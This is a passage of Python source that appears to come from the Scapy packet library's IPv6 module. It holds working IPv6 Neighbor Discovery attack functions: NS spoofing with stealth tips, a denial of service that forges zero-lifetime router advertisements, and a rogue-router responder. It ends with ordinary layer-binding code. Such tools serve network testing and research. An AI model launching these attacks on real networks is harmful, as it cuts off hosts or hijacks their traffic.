         emitting interface is used (selected from the destination address
         of the packet).

    target: target address of the NS; a dummy address (2001:db8::1) is used
            by default. Unless 'dst' is given, the destination of the packet
            is derived from it: the solicited-node multicast address
            associated with the target. Consider passing an explicit
            destination if the target is not an address of the victim.

    dst: destination address of the NS. Defaults to the solicited-node
         multicast address associated with the target (see above). The
         victim is not expected to check the destination address, so a
         multicast address such as ff02::1 should work to hit every host of
         the link. On the contrary, to be more stealth, provide the address
         of the victim so that the packet is sent to it only.

    src_mac: Ethernet source address of the frame; the address of the
             interface by default. Use something else to be more stealth.
             Note that this is not the address the victim uses to populate
             its neighbor cache.

    dst_mac: Ethernet destination address of the frame. It is computed when
             the IPv6 destination is multicast (all-nodes, solicited-node,
             ...), and resolved through a neighbor solicitation when it is
             unicast. Provide it explicitly to keep the attack stealth.

    loop: True by default: NS packets are sent in loop, 'inter' seconds
          apart. When False, a single packet is sent.

    inter: interval, in seconds, between two NS packets when 'loop' is True.

    iface: to force the sending interface.
    """

    iface = iface or conf.iface

    # The option advertises the caller's MAC address when one is given,
    # the one of the interface otherwise.
    src_lladdr = src_lladdr or get_if_hwaddr(iface)

    # Ethernet header: only the addresses explicitly requested are forced.
    l2_fields = {name: value
                 for name, value in (("src", src_mac), ("dst", dst_mac))
                 if value}

    if not dst:
        # No explicit destination: fall back to the solicited-node
        # multicast address associated with the target.
        target_bin = inet_pton(socket.AF_INET6, target)
        dst = inet_ntop(socket.AF_INET6, in6_getnsma(target_bin))

    # IPv6 header: the source is left to Scapy unless provided.
    l3_fields = {}
    if src:
        l3_fields["src"] = src
    l3_fields["dst"] = dst

    ns = (Ether(**l2_fields) /
          IPv6(**l3_fields) /
          ICMPv6ND_NS(tgt=target) /
          ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr))

    sendp(ns, inter=inter, loop=loop, iface=iface, verbose=0)
3982
3983
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
                                   ip_src_filter=None, reply_mac=None,
                                   tgt_mac=None):
    """
    The purpose of the function is to monitor incoming RA messages
    sent by default routers (RA with a non-zero Router Lifetime value)
    and invalidate them by immediately replying with fake RA messages
    advertising a zero Router Lifetime value.

    The result on receivers is that the router is immediately invalidated,
    i.e. the associated entry is discarded from the default router list
    and destination cache is updated to reflect the change.

    By default, the function considers all RA messages with a non-zero
    Router Lifetime value but provides configuration knobs to allow
    filtering RA sent by specific routers (Ethernet and/or IPv6 source
    address). With regard to emission, the multicast all-nodes address is
    used by default but a specific target can be used, in order for the DoS
    to apply only to a specific host.

    The fake RA carries a copy of every Prefix Information option found in
    the received RA, followed by a Source Link-Layer Address option. The
    latter holds the address advertised by the router in its own Source
    Link-Layer Address option or, when the RA has none, the Ethernet source
    address of the received frame.

    More precisely, following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
           DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RA messages received from this source will trigger replies.
         If other default routers advertised their presence on the link,
         their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific mac address.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RA messages received from this source address will trigger
         replies. If other default routers advertised their presence on the
         link, their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific IPv6 source
         address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.

    tgt_mac: allow limiting the effect of the DoS to a specific host,
         by sending the "invalidating RA" only to its mac address.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Check if packet req is an RA from a default router we should answer

        Returns 1 when req is an RA that passes both source filters and
        has a non-zero Router Lifetime, 0 otherwise.
        """

        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        ip_src = req[IPv6].src
        if ip_src_filter and ip_src != ip_src_filter:
            return 0

        # Check if this is an advertisement for a Default Router
        # by looking at Router Lifetime value
        if req[ICMPv6ND_RA].routerlifetime == 0:
            return 0

        return 1

    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
        """
        Callback that sends an RA with a 0 lifetime

        The reply impersonates the router: it reuses the IPv6 source
        address of req and is sent to the all-nodes address (ff02::1).
        """

        # Let's build a reply and send it

        src = req[IPv6].src

        # Prepare packets parameters
        ether_params = {}
        if reply_mac:
            ether_params["src"] = reply_mac

        if tgt_mac:
            ether_params["dst"] = tgt_mac

        # Select the link-layer address to advertise *before* walking the
        # PIOs: the walk below detaches the payload of each PIO, which
        # truncates req at its first PIO. Looking for the Source Link-Layer
        # Address option afterwards would miss it whenever the router
        # placed it after a PIO.
        if ICMPv6NDOptSrcLLAddr in req:
            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
        else:
            mac = req[Ether].src

        # Basis of fake RA (high pref, zero lifetime)
        rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)

        # Add it a PIO from the request ...
        tmp = req
        while ICMPv6NDOptPrefixInfo in tmp:
            pio = tmp[ICMPv6NDOptPrefixInfo]
            # Keep looking in what follows this PIO, and strip it so that
            # the PIO alone is appended to the reply.
            tmp = pio.payload
            del pio.payload
            rep /= pio

        # ... and source link layer address option
        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)

        sendp(rep, iface=iface, verbose=0)

        print("Fake RA sent with source address %s" % src)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
          iface=iface)
4104
4105
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
                           ip_src_filter=None):
    """
    Answer every Router Solicitation (RS) seen on the link with the
    provided Router Advertisement (RA). The RA is emitted at layer 2, which
    means that a packet starting with IPv6 will not work: it has to start
    with the Ethernet header. All in all, this is a thin wrapper around
    sendp() that watches the link for RS messages.

    An example is probably the best explanation:

      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
      ...

    The behavior can be tuned with the following arguments:

      ra: the RA message sent in response to each received RS message.

      iface: the interface (e.g. "eth0") of the system used both to listen
             for RS and to send the RA. conf.iface is used when none is
             provided.

      mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
             Only RS messages received from this source trigger a reply.
             The provided RA is never modified: to reach only the source
             of the RS when using this option, the Ethernet destination
             address of the RA has to be set to the same value.
             The default is None: RS are not filtered on their mac source.

      ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
             on. Only RS messages received from this source address trigger
             a reply. As for the previous argument, a specific Ethernet
             destination address will probably be wanted in the RA when
             this option is used.
    """

    def _wanted_rs(pkt):
        """
        Tell (1 or 0) whether pkt is an RS accepted by the source filters
        """

        for layer in (Ether, IPv6, ICMPv6ND_RS):
            if layer not in pkt:
                return 0

        if mac_src_filter and pkt[Ether].src != mac_src_filter:
            return 0

        if ip_src_filter and pkt[IPv6].src != ip_src_filter:
            return 0

        return 1

    def _answer_rs(pkt):
        """
        Send the RA as is and report the solicitation that triggered it
        """

        requester = pkt[IPv6].src
        sendp(ra, iface=iface, verbose=0)
        print("Fake RA sent in response to RS from %s" % requester)

    iface = iface or conf.iface

    sniff(store=0,
          filter="icmp6",
          lfilter=_wanted_rs,
          prn=_answer_rs,
          iface=iface)
4185
4186#############################################################################
4187# Pre-load classes ##
4188#############################################################################
4189
4190
def _get_cls(name):
    """
    Return the module-level object called name, or Raw when this module
    defines no such name.
    """
    try:
        return globals()[name]
    except KeyError:
        return Raw
4193
4194
def _load_dict(d):
    """
    Replace, in place, every value of d by what _get_cls() resolves it to.
    """
    # Walk a snapshot of the keys: only values are rewritten.
    for key in list(d):
        d[key] = _get_cls(d[key])
4198
4199
# Rewrite the three lookup tables in place: each value is handed to
# _get_cls(), i.e. looked up by name in the globals of this module, and
# replaced by the object found (Raw when no such name exists).
# NOTE(review): the tables presumably map option/type/next-header numbers
# to class names given as strings - confirm against their definitions.
_load_dict(icmp6ndoptscls)
_load_dict(icmp6typescls)
_load_dict(ipv6nhcls)
4203
4204#############################################################################
4205#############################################################################
4206# Layers binding #
4207#############################################################################
4208#############################################################################
4209
# Declare IPv6 (and the IPv46 helper class) in Scapy's layer 3 and layer 2
# type tables, under the protocol / link-type constants listed below.
# NOTE(review): register_num2layer() presumably records the number -> class
# direction only, whereas register() records both - confirm.
# NOTE(review): 31 is a bare link-type number with no named constant here -
# confirm which link type it stands for.
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)

# IPv6 on top of link layers and GRE: selected by the 0x86dd protocol
# value (the EtherType of IPv6) in the underlying header.
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
# AF_INET6 values are platform-dependent. For a detailed explanation, read
# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354  # noqa: E501
if WINDOWS:
    bind_layers(Loopback, IPv6, type=0x18)
else:
    bind_layers(Loopback, IPv6, type=socket.AF_INET6)
# Transport layers selected by the Next Header field, both for regular
# IPv6 packets and for IPerror6.
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
# Encapsulations: IPv6 in IPv4, IPv6 in IPv6, IPv4 in IPv6 and GRE in IPv6.
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)